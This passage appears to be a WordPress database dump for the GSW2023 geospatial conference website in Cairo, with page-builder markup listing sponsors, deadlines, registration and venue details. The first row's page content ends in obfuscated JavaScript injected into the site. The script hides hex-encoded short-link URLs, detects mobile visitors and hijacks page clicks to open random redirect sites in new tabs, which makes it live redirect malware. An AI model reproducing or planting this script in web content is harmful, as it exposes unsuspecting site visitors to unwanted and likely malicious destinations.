_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:39:46','2023-05-16 01:39:46','',3066,'https://gsw2023.com/?p=4484',0,'revision','',0),
(4485,1,'2023-05-16 01:39:55','2023-05-16 01:39:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201158054{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 size-medium\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"300\" height=\"91\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column 